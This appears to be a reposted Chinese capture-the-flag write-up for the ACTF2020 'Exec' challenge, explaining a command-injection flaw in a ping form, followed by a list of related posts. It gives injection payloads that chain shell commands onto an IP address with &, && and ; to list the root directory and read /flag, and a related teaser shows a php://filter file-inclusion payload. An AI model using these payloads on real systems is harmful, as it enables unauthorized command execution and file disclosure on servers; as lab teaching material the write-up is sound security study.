首页 > 其他分享 >[ACTF2020 新生赛]Exec 1

[ACTF2020 新生赛]Exec 1

时间:2023-10-03 22:00:12浏览次数:37  
标签:ACTF2020 127.0 Exec 0.1 新生 cat flag ls

原理

linux系统命令的使用
命令执行漏洞

解题过程

打开靶场发现有ping功能,猜测是涉及命令执行漏洞,根据题目的Exec也能看出回来,先试试ping 127.0.0.1,没问题

接着使用&连接符执行多条系统命令,执行了ls命令,发现只有index.php,猜测flag是在根目录那里,所以我们就是用ls /来找出flag

payload:127.0.0.1&ls / 发现了flag文件

接下来我们读取文件内容
payload:127.0.0.1&cat /flag
成功爆出flag

系统命令的连接还可以127.0.0.1&&cat /flag或者127.0.0.1;cat /flag或者
RCE命令执行漏洞绕过姿势:https://blog.csdn.net/m0_64815693/article/details/127268809

标签:ACTF2020,127.0,Exec,0.1,新生,cat,flag,ls
From: https://www.cnblogs.com/BEONTHE/p/17741724.html

相关文章

  • BUUOJ[ACTF2020 新生赛]Include 1
    原理文件包含伪协议的利用解题过程靶场进入发现一个超链接,点了一下发现跳转到了flag.php文件传递了参数file=flag.php。猜测应该是文件包含。文件包含读取文件源码要想到伪协议了。--要多补补了payload:?file=php://filter/read=convert.base64-encode/resource=flag.php......
  • LINUX:FAILED: Execution Error, return code 2 from org.apache.hadoop.hive.ql.exec.
     如图,问题表现为linux中可直接通过hive进行数据插入但在通过datagrip却更改不了此时,可能时yarn的运行分配的内存较少,或堆内存溢出。在yarn-site.xml中更改,以及mapred-site.xml中更改,完成。yarn的<property><name>yarn.scheduler.minimum-allocation-mb</name>......
  • CTFer成长记录——CTF之Web专题·[SWPUCTF 2021 新生赛]jicao
    一、题目链接  https://www.nssctf.cn/problem/384二、解法步骤  审计代码:  只需POST传入id=wllmNB,GET传入json=json_encode(array('x'=>'wllm'))即可。  payload:?json={"x":"wllm"},利用hackbar,POST传入id=wllmNB。  拿到flag:三、总结  基本操作。 ......
  • execjs执行js出现window对象未定义时的解决
    参考:https://www.jianshu.com/p/b82def6b3abchttps://blog.csdn.net/xx117501/article/details/102804286......
  • 深入理解ThreadPoolExecutor
    在上节介绍ThreadPoolExecutor时,大部分参数中都很简单,只有workQueue和handler需要进行详细说明。队列参数workQueue指被提交但未执行的任务队列,它是一个BlockingQueue接口的对象,仅用于存放Runnable对象。根据队列功能分类,在ThreadPoolExecutor的构造函数中可使用以下......
  • SWPU2020新生赛
    MISC套娃拿到题目看到套娃还以为是压缩包套娃呢其实考的是RC4加密,需要找到key和data用010打开xls文件,发现是压缩包,全部改成zip后缀。一直解压解压到用010打开easyrc4.zip查看二进制数据,最下面有个password:6e4c834d77cba03af41e1562a5bce84e然后又根据打开的key:ABCDEFGHIJK......
  • 华为云ROMA Connect行业生态联盟成立,携手共建行业软件合作新生态
    9月22日,在上海举办的华为全联接大会2023大会上,华为云ROMAConnect联合多家生态伙伴,成立华为云ROMAConnect行业生态联盟,携手共建企业应用集成平台和行业软件合作新生态,致力于为客户数字化转型提供更专业的联合解决方案,打破时间、空间、开放鸿沟,联接企业现在与未来。华为云ROMAConn......
  • SWPUCTF 2022 新生赛
    Web奇妙的MD5打开得到一个md5加密窗口放入ffifdyop,这个字符串被md5哈希了之后会变成276f722736c95d99e921722cf9ed621c,这个字符串前几位刚好是'or'6而Mysql刚好又会把hex转成ascii解释,因此拼接之后的形式是1select*from'admin'wherepassword=''or'6xxxxx',等价......
  • Docker - ERROR: failed to solve: golang:latest: error getting credentials - err:
    Dockerfile:FROMgolang:latestWORKDIR/appADD..RUNgoenv-wGOPROXY=https://goproxy.io,directRUNgogetRUNgobuild-oapp.CMD["/app/app"] zzh@ZZHPC:/zdata/MyPrograms/Go/aaa$dockerbuild-ttest:v1.[+]Building1.3s(3/3)FINI......
  • ThreadPoolExecutor线程池
    ......